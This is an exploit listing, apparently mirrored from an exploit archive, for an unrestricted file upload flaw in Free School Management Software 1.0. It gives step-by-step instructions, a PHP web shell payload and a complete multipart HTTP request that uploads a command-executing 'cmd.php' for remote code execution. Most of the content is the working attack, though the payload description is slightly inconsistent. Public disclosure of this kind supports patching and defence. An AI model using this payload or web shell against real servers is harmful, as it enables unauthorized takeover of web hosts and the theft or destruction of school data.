Exploit for Free School Management Software 1.0 Shell Upload

Name: Exploit for Free School Management Software 1.0 Shell Upload
Rating: 5 (327 reviews)
2021-12-10 | CVSS 0.0
## https://sploitus.com/exploit?id=PACKETSTORM:165231
# Exploit Title: Free School Management Software 1.0 - Remote Code Execution (RCE)  
# Exploit Author: fuuzap1  
# Date: 7-12-2021  
# Category: Web application  
# Vendor Homepage: https://www.sourcecodester.com/php/15073/free-school-management-software.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/jovahsource/free_and_open_source.zip  
# Version: 1.0  
# Tested on: windows  
# Vulnerable page: http://localhost/admin/examQuestion  
  
  
Technical description:  
A unrestricted file upload vulnerability exists in the Free school  
management software v1.0. An attacker can leverage this vulnerability in  
order to get a remote code execution on the affected web server. Once a php  
webshell containing "<?php system($_GET["cmd"]); ?>" gets uploaded it is  
getting save into /uploads/exam_question/ directory, and is accessible by  
all users. the attacker can gain remote code execution on the web server.  
  
Steps to exploit:  
1) Navigate to http://localhost/admin/manage_profile  
2) click "ADD NEW QUESTION PAPER" edit base infomation  
3) uploading a php webshell containing "<?php system($_GET["cmd"]); ?>" in  
the Field "upload Drag and drop a file here or click"  
3) Click "save"  
4) open http://localhost/uploads/exam_question/cmd.php?cmd=phpinfo() then  
php code execution  
Proof of concept (Poc):  
The following payload will allow you to run the javascript -  
<?php system($_GET["cmd"]); ?>  
  
---  
POST /admin/examQuestion/create HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0)  
Gecko/20100101 Firefox/89.0  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data;  
boundary=---------------------------183813756938980137172117669544  
Content-Length: 1331  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/admin/examQuestion  
Cookie: ci_session=793aq6og2h9mf5cl2q2b3p4ogpcslh2q  
Upgrade-Insecure-Requests: 1  
  
-----------------------------183813756938980137172117669544  
Content-Disposition: form-data; name="name"  
  
test4  
-----------------------------183813756938980137172117669544  
Content-Disposition: form-data; name="class_id"  
  
2  
-----------------------------183813756938980137172117669544  
Content-Disposition: form-data; name="subject_id"  
  
5  
-----------------------------183813756938980137172117669544  
Content-Disposition: form-data; name="timestamp"  
  
2021-12-08  
-----------------------------183813756938980137172117669544  
Content-Disposition: form-data; name="teacher_id"  
  
1  
-----------------------------183813756938980137172117669544  
Content-Disposition: form-data; name="file_type"  
  
txt  
-----------------------------183813756938980137172117669544  
Content-Disposition: form-data; name="status"  
  
1  
-----------------------------183813756938980137172117669544  
Content-Disposition: form-data; name="description"  
  
123123  
-----------------------------183813756938980137172117669544  
Content-Disposition: form-data; name="_wysihtml5_mode"  
  
1  
-----------------------------183813756938980137172117669544  
Content-Disposition: form-data; name="file_name"; filename="cmd.php"  
Content-Type: application/octet-stream  
  
<?php eval($_GET["cmd"]); ?>  
-----------------------------183813756938980137172117669544--  
---